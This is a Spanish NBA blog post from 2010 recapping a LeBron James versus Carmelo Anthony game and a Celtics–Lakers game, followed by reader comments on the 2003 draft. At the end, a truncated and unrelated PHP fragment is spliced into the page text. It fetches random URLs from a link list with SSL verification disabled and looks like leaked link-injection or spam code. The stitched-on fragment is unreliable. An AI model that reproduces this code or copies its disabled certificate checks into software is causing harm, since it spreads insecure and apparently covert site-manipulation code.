La Crónica (18/02/2010)

19 de February de 2010 por TheDeerHunter

I Love this Game!!!

Melo vs LeBron. Un duelo llamado a ser un clásico de nuestro tiempo. Un choque que anoche fue capaz de eclipsar hasta el mismísimo Lakers – Celtics. Los dos mejores aleros del momento. 83 puntitos que metieron entre los dos angelitos ante casi 21.000 espectadores en el Quicken Loans Arena de Cleveland. En el caso de El Elegido, aliñados con un triple doble que no sirvió de mucho ante el ímpetu de unos motivadísimos Nuggets. Pudo haber ayudado a inclinar la balanza a su favor la vuelta de Maurice Williams… o que Shaq anotara uno sólo de sus tiros libres, la gran losa de los Cavs anoche (tomemos nota para los playoffs). Empieza con mal pie Antawn Jamison que contempló el espectáculo desde la grada.

Tras esta exhibición venía un descafeinado Boston@Lakers por la 5ª ausencia consecutiva de Kobe Bryant. Ray Allen lleva siendo el villano de los Celtics justamente desde el último enfrentamiento ante los amarillos. Anoche fue el héroe como tantas noches que lo seguirá siendo, como mínimo, hasta el final de esta temporada (y yo me alegro). Fue la punta de lanza de su equipo en un partido nuevamente de infarto en el que Fisher erró la canasta ganadora gracias a la defensa, también, de Allen. Por los Lakers, en la primera derrota sin Kobe, el mejor fue nuevamente Pau bien secundado por Odom que levantó varias veces al público de sus asientos en una emocionante remontada que no pudieron culminar. Noticia: Vujacic cuajó un buen partido celebrando que ha logrado abortar el fichaje de Hinrich. Si esto le hace reaccionar bienvenido sea… aunque no tenemos excesiva confianza en el bueno de Shasha.

PREMIOS

MVP: Hoy no podemos quedarnos con uno sólo. LeBron James, 43 puntos, 13rebotes, 15asistencias, 4 tapones y 2 robos. Carmelo Anthony, 40 puntos, 6 rebotes, 7 asistencias, 2 tapones y 1 robo aguantando un severo castigo de la defensa de los Cavs. El espectáculo en estado puro.

El rookie: Sólo jugó Ty Lawson y estuvo bastante desaparecido.

La sorpresa: No es moco de pavo ver a Vujacic jugar bien aunque sólo sea un día y durante un cuarto de hora.

La decepción: Derek Fisher tuvo un partido para olvidar con 1 de 9 y 0 de 3 en triples (hasta un 1 de 3 en tiros libres) pero yo también le hubiera dado la bola a él para intentar ganar el partido, al no estar Kobe. No estamos en playoffs de todas formas…

Comenta

15 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Tremendo lo de Lebron y Carmelo. Sabe alguien donde se puede conseguir el partido?
    Por cierto es el del 2003 el mejor draft de la historia? Os propongo un análisis…(perdonad por haceros trabajar)

    Un slaudo,
    Pablo

      Citar

  2. couxe dice:
    #2

    Aunque tal vez sea un poco pronto para poder decir si es o no el mejor de la historia, yo diría que ahora mismo apunta a ser como poco uno de los 3 ó 4 mejores seguro, junto con los del 1984, 1985 y 1996…
    1984: Olajuwon, Jordan, Barkley, Thorpe, K.Willis Stockton.
    1985: Ewin, McDaniel, Mullin, Schrempf, Malone, Dumars.
    1996: Iverson, Abdur-Rahim, Marbury, Ray Allen, Bryant, Stojakovic, Nash, Jermaine O’Neal.

      Citar

  3. pcerezo dice:
    #3

    Ahí te quería yo ver. Creo que el del 96 es peor, pero un análisis puede ser interesante.

    Pablo

      Citar

  4. sayim dice:
    #4

    Para compararlo con el del 96 creo q aun es un poco pronto, pero no creo que lleguen al del 84 ni de broma…

      Citar

  5. Noname dice:
    #5

    hombre el del 84 me parece que es el mejor sin duda para mi

      Citar

  6. Txusma dice:
    #6

    Bueno, vamos a darle unos años más a la generación del 2003 pero recordad que aparte de Lebron y Carmelo tb de esa generación son Dwyane Wade y Chris Bosh. Eso sí, superar los 4 mega-cracks del 1984 (Olajuwon, Jordan, Barkley, Stockton) es bastante complicado.

    Por cierto, cualquiera puede escribir ese analisis. Como no nos cansamos de repetir el blog es colaborativo así que cualquiera puede escribir y cualquiera opinar.

      Citar

  7. Viva_Dirk dice:
    #7

    Dado que tengo algunos problemas técnicos para escribir un artículo del que llevo tiempo detrás, recojo el guante y haré ese análisis que se pide.

      Citar

  8. sayim dice:
    #8

    Yo no se tanto como para escribir semejante articulo, aunque si me encantaria leerlo. De momento la generacion del 2003 gano un anillo (wade) siendo primer espada y no se si van a poder ganar tantos como la generacion del 84 (si bien es cierto q en esta estaba un tal jordan…). De todas maneras los 4 que se nombran son Hall of Fame y nombrados entre los 50 mejores de la historia de la nba y dudo que los 4 del 2003 vayan a llegar a semejantes logros. No tengo dudas de lebron y de wade, pero de los otros dos…
    También me gustaría hacer una mención al número dos del draft de 2003, que por cierto creo q se movio en el tremendo dia d ayer

    Un saludo

      Citar

  9. rojorob dice:
    #9

    Ahí sayim, ahí. Otro post con las grandes cagadas del draft, empezando por Milicic.

      Citar

  10. sayim dice:
    #10

    pues en el 84 tambien tenemos algun q otro ejemplo. Y quiza mas importante….

      Citar

  11. HeiNeKeN dice:
    #11

    Un tal Sam xD

      Citar

  12. max dice:
    #12

    Realmente al GM de los Pistons en el 2003 (Joe Dumars??) habria que darle un estirón de orejas!!!! De todas formas Milicic puede presumir de ganar un anillo en su primer año, lo que está al alcance de muy pocos XD

      Citar

  13. kantonyo dice:
    #13

    PcCerezo, en rojadirecta te los puedes descargar. Yo me acabo de ver los dos partidos y he disfrutado como un enano. Me quedo con el primero, con el Cavs-Nuggets. Vaya pique y miraditas que han tenido LeBron y Carmelo. No es por tirarme flores, pero ya dije a principio de temporada que a Denver lo consideraba un aspirante y que este año iba a ser el año de Carmelo. Yo creo que en este momento está dentro del grupo de elegidos: LeBron, Wade y Kobe.

      Citar

  14. Love Denise dice:
    #14

    lo de melo y james fue brutal, y lo de dumars con Milicic, la cagada del siglo.
    Hace tiempo que pienso que Fisher ya no está para más de 15 minutos, creo que el base debe ser Brown, puesto que Farmar me ofrece todavía menos garantías que Fisher, aunque este año esté algo mejor que en anteriores, pero no creo que pueda ser el base titular de estos Lakers en los próximos años.
    Por lo que leí en algunos magazines californianos, parece que Vujacic va por ahí creyendose el guay de L.A. y rodeandose de todo tipo de celebridades, desde los Beckham a Sharapova y otras actrices y modelos. Quizás esto tenga que ver en su rendimiento, a lo mejor en otro equipo lo haría algo mejor y no iría arrastrandose por las pistas. Lo de esta noche, no creo que se repita mucho.

      Citar

  15. Love Denise dice:
    #15

    aunque lo que ha hecho esta noche, tampoco es como para tirar cohetes (me refiero a vujacic)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>